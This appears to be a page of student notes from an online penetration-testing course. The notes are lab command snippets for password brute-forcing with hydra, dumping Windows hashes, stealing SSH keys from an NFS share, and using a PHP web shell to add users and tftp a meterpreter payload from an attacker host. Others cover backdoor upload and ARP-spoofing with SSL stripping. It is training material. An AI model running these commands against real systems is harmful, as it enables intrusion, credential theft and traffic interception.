Advanced Penetration Testing Notes

Syntax Error

As by default IPV6 syntax will be used, Try /router_add// /target_add//   use / address // [view]

By: PRATEEK | Related Lesson: Traffic Capture (part 5) ettercap | Modified: May 17, 2017

Session metasploit

session -l  Lists the sessions opened previously(background session), usually it runs in background by pressing ctrl+z To get back into the session we can do sessions -i <session ID> [view]

By: praveenAgent47 | Related Lesson: Metasploit (part 3) Operation | Modified: May 17, 2017

python

connect vs connect_ex [view]

By: suhailmt | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: May 17, 2017

Offline Password Attacks

nano windowshashes.txt   [view]

By: rspeight10 | Related Lesson: Passwords (part 3) Offline Password Attacks | Modified: May 16, 2017

Online Password Hacking

hydra -l <username> -p <password> -L (list of names) -P (List of Password) hydra -l Georgia -P passwords.txt 192.168.1.76 ftp [view]

By: rspeight10 | Related Lesson: Passwords (part 2) Online Password Cracking | Modified: May 16, 2017

Password Attacks

meterpreter > hashdump bkhive system syskey.txt samdump2 sam syskey.txt   [view]

By: rspeight10 | Related Lesson: Passwords (part 1) Password Attacks | Modified: May 16, 2017

Attaching to an IP

Network file system showmount -e <ip-address> mkdir /tmp/georgia mount -t nfs -o nolock 192.168.1.80:/excport/Georgia /tmp/Georgia cd /tmp/georgia ls -a (shows hidden directories) cat authorized_keys cp id_rsa /root/.ssh/id_rsa apt-get install [view]

By: rspeight10 | Related Lesson: Exploitation (part 6) Attaching to an IP Address | Modified: May 16, 2017

SQL Commands

192.168.1.76/phpmyadmin (you have access to MySQL DB) 192.168.1.76/shell.php?cmd net user james Georgia /add atftpd –daemon –bind-address 192.168.1.77 /tmp netstat -antp 192.168.1.76/shell.php?cmd=tftp 192.168.1.77 get meterpreter.php c:\ [view]

By: rspeight10 | Related Lesson: Exploitation (part 2) SQL Commands | Modified: May 16, 2017

Direct Exploitation

cadaver http://192.168.1.76/webdev wampp xampp nano test.txt make sure you can upload files192.168.1.76/webdev/test.txt 192.168.1.76/xampp/splash.php /usr/share/webshells cd php simple-backdoor.php /usr/share/webshells/php> cadaver http://192.168. [view]

By: rspeight10 | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: May 16, 2017

SSL Stripping

SSL Man in the Middle (arpspoof the ipaddress) enable arpspoofinf arpspoof -i eth0 -t 192.168.1.23 192.168.1.1 enable iptables rules iptables-t nat -PREROUTING -p tcp –destionation-port 80 -j REDIRECT –to-port 8080 sslstrip -l 8080     [view]

By: rspeight10 | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: May 16, 2017

« First ‹ Previous 1 42 132 140 141 142 143 144 152 242 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel